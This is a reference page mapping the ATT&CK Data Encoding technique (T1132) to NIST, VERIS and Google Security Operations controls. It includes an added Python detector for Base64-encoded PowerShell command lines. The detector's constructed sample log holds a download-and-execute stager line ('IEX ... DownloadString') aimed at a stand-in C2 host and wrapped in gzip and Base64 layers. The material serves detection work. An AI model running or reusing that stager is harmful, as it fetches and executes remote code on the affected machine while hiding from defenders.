T1132 Data Encoding Mappings

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.


NIST 800-53 Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name
CA-07 | Continuous Monitoring | mitigates | T1132 | Data Encoding
CM-06 | Configuration Settings | mitigates | T1132 | Data Encoding
SI-03 | Malicious Code Protection | mitigates | T1132 | Data Encoding
CM-02 | Baseline Configuration | mitigates | T1132 | Data Encoding
SI-04 | System Monitoring | mitigates | T1132 | Data Encoding
AC-04 | Information Flow Enforcement | mitigates | T1132 | Data Encoding
SC-07 | Boundary Protection | mitigates | T1132 | Data Encoding

VERIS Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name
action.hacking.variety.Evade Defenses | Modification of the action (rather than the system, as in 'Disable controls') to avoid detection. | related-to | T1132 | Data Encoding
action.malware.variety.C2 | Malware creates Command and Control capability for malware. Child of 'Backdoor or C2'. | related-to | T1132 | Data Encoding

GCP Mappings

Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name
google_secops | Google Security Operations | technique_scores | T1132 | Data Encoding
Comments: Google Security Ops is able to trigger an alert based on known indicators used by the adversary, such as data encoding techniques. This technique was scored as minimal based on low or uncertain detection coverage factor.
References:
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/ioc_sigma/windows/powershell_encoded_command__sysmon.yaral
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/emotet_process_creation.yaral
https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/suspicious_powershell_parameter_substring.yaral
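The Sysmon encoded-command rule cited in the Google Security Operations mapping above fires on the PowerShell -EncodedCommand pattern. The following is an added example written for this page (it is not code from the Mappings Explorer or from the chronicle/detection-rules repository) showing the decode-and-peel logic a detection engineer would put behind such an alert: it strips the Base64-of-UTF-16LE layer that -enc requires, then keeps unwrapping the nested Base64 and gzip layers that the technique description mentions. The Sysmon-style command lines, the c2.example.invalid host and the stub script are constructed for the example.

```python
"""Added example (not part of the Mappings Explorer page or of Google's
detection rules): decode Base64-encoded PowerShell command lines, the
pattern behind the Sysmon 'powershell_encoded_command' rule referenced
above, then peel nested Base64 and gzip layers from the decoded script.
All log lines below are constructed for the example."""
import base64
import binascii
import gzip
import re
from dataclasses import dataclass, field
from typing import List, Optional

# powershell.exe accepts -EncodedCommand, -e, -ec and any prefix from -enc up.
ENC_FLAGS = {"-e", "-ec"} | {"-encodedcommand"[:i] for i in range(4, 16)}
# A run of Base64 text long enough to be a payload rather than an ordinary word.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"


@dataclass
class Finding:
    line_no: int
    layers: List[str] = field(default_factory=list)  # encoding layers, outermost first
    script: str = ""  # innermost decoded content, truncated for display


def encode_powershell(script: str) -> str:
    """Adversary side: build what 'powershell -enc' expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _b64(blob) -> Optional[bytes]:
    """Strict Base64 decode; None if the blob is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def peel(data: bytes, layers: List[str]) -> bytes:
    """Strip nested gzip and Base64 layers until nothing more unwraps."""
    while True:
        if data.startswith(GZIP_MAGIC):
            try:
                data = gzip.decompress(data)
            except (OSError, EOFError):
                return data
            layers.append("gzip")
            continue
        m = B64_RUN.search(data)
        inner = _b64(m.group(0)) if m else None
        if inner is None:
            return data
        data = inner
        layers.append("base64")


def inspect_command_line(line_no: int, cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line carries an encoded PowerShell payload."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if "-" + tok.lstrip("-/").lower() not in ENC_FLAGS:
            continue
        raw = _b64(tokens[i + 1].strip("\"'"))
        if raw is None:
            continue
        try:
            script = raw.decode("utf-16-le")
        except UnicodeDecodeError:
            continue
        finding = Finding(line_no, ["base64/utf-16le"])
        inner = peel(script.encode("utf-8"), finding.layers)
        finding.script = inner.decode("utf-8", "replace")[:120]
        return finding
    return None


def scan(log_lines: List[str]) -> List[Finding]:
    hits = (inspect_command_line(n, line) for n, line in enumerate(log_lines, 1))
    return [f for f in hits if f is not None]


# Constructed sample: a stager whose real command is gzip-compressed, then
# Base64-encoded inside the script, then the whole script -enc encoded.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2')"
STUB = (
    "$s=[IO.Compression.GzipStream]::new([IO.MemoryStream]::new("
    "[Convert]::FromBase64String('%s')),[IO.Compression.CompressionMode]::Decompress)"
    % base64.b64encode(gzip.compress(INNER.encode())).decode()
)
SAMPLE_LOG = [  # constructed Sysmon-style CommandLine values, not real telemetry
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    "powershell.exe -NoP -W Hidden -enc " + encode_powershell(STUB),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    'cmd.exe /c "powershell -ec ' + encode_powershell("Get-Date") + '"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {' > '.join(f.layers)} -> {f.script}")
```

Two details matter in practice: the decoder must accept every parameter prefix PowerShell accepts (a rule that only matches the literal string -EncodedCommand is trivially bypassed with -enc or -ec), and the decoded script should itself be inspected, because the Base64 layer that -enc adds is usually not the only one. Note that the second sample line would also be the kind of command a benign administrator never types interactively, which is why the Google rule treats the encoding itself as an indicator rather than trying to classify the payload.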

ATT&CK Subtechniques

Technique ID | Technique Name | Number of Mappings
T1132.001 | Standard Encoding | 8
T1132.002 | Non-Standard Encoding | 8